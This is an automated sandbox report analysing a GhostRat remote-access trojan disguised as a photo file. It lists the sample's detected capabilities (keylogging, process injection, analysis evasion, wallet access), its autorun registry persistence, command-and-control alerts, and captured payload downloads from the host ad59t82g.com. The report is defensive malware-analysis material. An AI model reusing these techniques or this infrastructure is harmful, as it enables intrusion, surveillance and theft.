Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
photo_2024-09-18_20-00-20.exe

Overview

General Information

Sample name:photo_2024-09-18_20-00-20.exe
Analysis ID:1514420
MD5:e054e331caed0e50fc56f6b548fd10c5
SHA1:a56178e3a84e48f7ab6482db08b52d05837dec59
SHA256:b2a3aaf4eb4deb85462e1ee39c84caf2830091c1bff8014ad13147897b25e24c
Tags:exe
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionalty to change the wallpaper
Drops password protected ZIP file
Found API chain indicative of debugger detection
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to access browser extension known for cryptocurrency wallets
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64
  • photo_2024-09-18_20-00-20.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe" MD5: E054E331CAED0E50FC56F6B548FD10C5)
    • 8VhJ2Jq.exe (PID: 1492 cmdline: "C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • 8VhJ2Jq.exe (PID: 4396 cmdline: "C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • 8VhJ2Jq.exe (PID: 1576 cmdline: "C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.3859300120.00000000050B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000004.00000003.3697654357.00000000050B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000004.00000002.3913735905.0000000003CC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000004.00000002.3913881702.0000000003EB0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000004.00000003.3359487322.00000000013B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.3.8VhJ2Jq.exe.50b5a53.9.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              4.2.8VhJ2Jq.exe.3cc1004.3.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                4.2.8VhJ2Jq.exe.3eb0000.5.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  4.3.8VhJ2Jq.exe.3c01053.2.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    4.3.8VhJ2Jq.exe.13b6033.0.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      Click to see the 23 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exe, ProcessId: 7288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-20T12:00:37.291075+020020528751A Network Trojan was detected192.168.2.549726202.79.173.480TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-20T12:00:03.881032+020028033043Unknown Traffic192.168.2.549723104.21.22.8880TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Program Files (x86)\EjXjKxze\t4d.tmpAvira: detection malicious, Label: DR/FakePic.Gen
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000000.2054063350.00000000005AD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_004b11a9-a
                      Source: photo_2024-09-18_20-00-20.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
                      Source: Binary string: E:\ZM_SOUI\independent\GameInstall\Release\GameInstall.pdb source: photo_2024-09-18_20-00-20.exe
                      Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: z:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: x:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: v:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: t:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: r:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: p:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: n:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: l:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: j:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: h:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: f:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: b:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: y:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: w:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: u:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: s:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: q:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: o:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: m:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: k:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: i:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: g:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: e:Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: c:Jump to behavior
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeFile opened: [:Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_0044BCC0 __fseeki64,__ftelli64,FindFirstFileW,FindClose,0_2_0044BCC0
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeCode function: 0_2_00407096 __EH_prolog3_GS,_memset,GetLogicalDriveStringsW,PathAppendW,_memset,GetDriveTypeW,PathAppendW,PathAppendW,_wcslen,0_2_00407096
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984\COMCTL32.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\SysWOW64\KERNELBASE.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_d94bc80de1097097Jump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.19041.2006_none_d94bc80de1097097\gdiplus.dllJump to behavior
                      Source: C:\Users\user\Desktop\photo_2024-09-18_20-00-20.exeFile opened: C:\Windows\SysWOW64\KERNEL32.DLLJump to behavior

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.5:49726 -> 202.79.173.4:80
                      Source: global trafficHTTP traffic detected: GET /1/lon2.bmp HTTP/1.1Host: ad59t82g.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /1/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficHTTP traffic detected: GET /1/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficHTTP traffic detected: GET /1/t2.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49723 -> 104.21.22.88:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: unknownTCP traffic detected without corresponding DNS query: 202.79.173.4
                      Source: C:\Program Files (x86)\EjXjKxze\8VhJ2Jq.exeCode function: 4_2_032D3340 recv,timeGetTime,_memmove,4_2_032D3340
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Sep 2024 10:00:05 GMTContent-Type: image/x-ms-bmpContent-Length: 6443425Connection: keep-aliveLast-Modified: Thu, 08 Aug 2024 15:32:21 GMTETag: "66b4e505-6251a1"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 0Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VHWmezBx%2BOtNnvU4z4qZf39f4sDyd60tyDPBRyCbupxva4FHq1BxK%2FxSluSEGPoY09aR8q4RGH9K6M0iA2KL7vQC7bNBS10e8Evdb83Kc6Ya9QvGYblq4TLTW21R1Ng%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c60f76a4af372bc-EWRData Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c 96 53 a8 93 1a 43 8a 40 72 c9 cd 4d f3 75 0b d3 e0 d6 60 25 ae d3 66 4a 4b 5d b6 5e 17 3b 24 29 1b a7 07 28 1d 48 ce 8a 24 dd e5 0f 57 31 3b 63 bc e1 b9 39 3b 66 4c 46 9f 14 f3 c4 02 68 95 c3 21 3d 7c d0 7a 12 01 3c 08 32 de 1b 41 20 0a ef 8d 8e 3c cb 3d 54 8e 28 0e 74 2d a5 bb e4 c7 6a f7 4b 3c 19 7a 3e b3 55 75 93 98 a4 85 fc 3e 61 cb 06 22 80 2d 2c 37 b8 2a 5c b0 51 a6 6b 96 fb ee 27 23 f4 d0 04 a5 0c 50 95 84 0f 9b 47 8f 5b 48 3b 2a bb f4 f8 7d 94 68 ed 84 fa fd 02 9b 9e ae f0 7d 19 69 b4 c0 78 83 f0 ef 95 a1 21 73 56 4e d7 8b 38 9a ed e1 e8 8f 47 a6 26 5f 23 ea 1f c9 5d 4a c2 09 00 e3 5f 67 5d 15 a9 47 b3 f4 9d ca 98 2c 66 e6 52 4a 96 de f4 55 2f 87 04 f5 77 df 64 b2 b2 cf 7f db 8e e0 a3 c6 bc f2 d8 76 d0 2d Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G,fRJU/wdv-
                      Source: global trafficHTTP traffic detected: GET /1/lon2.bmp HTTP/1.1Host: ad59t82g.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /1/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficHTTP traffic detected: GET /1/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficHTTP traffic detected: GET /1/t2.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficDNS traffic detected: DNS query: ad59t82g.com
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000003.3074745057.0000000000849000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289071499.0000000003599000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t2.bmp
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000003.3099113503.0000000000849000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/d.bmpf
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000003.3099113503.0000000000849000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/d.bmp~
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3287826886.000000000019D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/lon2.bmp
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.000000000080D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/lon2.bmp7W
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3288456452.000000000080D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/lon2.bmpHh
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289071499.0000000003599000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/t2.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000002.3289071499.0000000003599000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/text.bmpC:
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000003.3099113503.0000000000849000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/6
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: libcef.dll.0.drString found in binary or memory: http://www.astro.com/swisseph.
                      Source: 8VhJ2Jq.exe, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: http://www.astrolog.org/astrolog.htm
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000003.3256424262.00000000038B5000.00000004.00000020.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000003.3141274556.0000000010030000.00000004.00000020.00020000.00000000.sdmp, 8VhJ2Jq.exe, 00000004.00000002.3914567372.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: http://www.astrolog.org/astrolog.htmMain
                      Source: 8VhJ2Jq.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: libcef.dll.0.drString found in binary or memory: http://www.gnu.org
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: http://www.openssl.org/support/faq.html
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: http://www.openssl.org/support/faq.html....................
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: http://zmconfig.duoyi.com/dyminiinstall.txt
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: http://zmconfig.duoyi.com/dyminiinstall.txt_UPDATE_MODULE_HELPER_WINDOW_DUOYI%d
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: http://zmlog.duoyi.com:8080/api/zm/data/rece_download_data
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://chc-bd.duoyi.com
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://chc-bd.duoyi.comBigServerUrl1.0.2
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                      Source: 8VhJ2Jq.exe, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.html
                      Source: photo_2024-09-18_20-00-20.exe, 00000000.00000003.3256424262.00000000038B5000.00000004.00000020.00020000.00000000.sdmp, photo_2024-09-18_20-00-20.exe, 00000000.00000003.3141274556.0000000010030000.00000004.00000020.00020000.00000000.sdmp, 8VhJ2Jq.exe, 00000004.00000002.3914567372.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.htmlPostScript
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://id.duoyi.com/html/privacy.html
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://id.duoyi.com/html/service-agreement.html
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://id.duoyi.com/html/service-agreement.htmlopenhttps://id.duoyi.com/html/xieyi.htmlhttps://id.d
                      Source: photo_2024-09-18_20-00-20.exeString found in binary or memory: https://id.duoyi.com/html/xieyi.html
                      Source: 8VhJ2Jq.exe, 00000004.00000002.3912030469.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3391720593.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3470560132.00000000007F3000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.ubi.com/
                      Source: 8VhJ2Jq.exe, 00000004.00000002.3912030469.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000005.00000002.3391720593.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3470560132.00000000007F3000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired
                      Source: 8VhJ2Jq.exe, 8VhJ2Jq.exe, 00000005.00000002.3392876071.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, 8VhJ2Jq.exe, 00000006.00000002.3471860865.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: https://www.geonames.org/
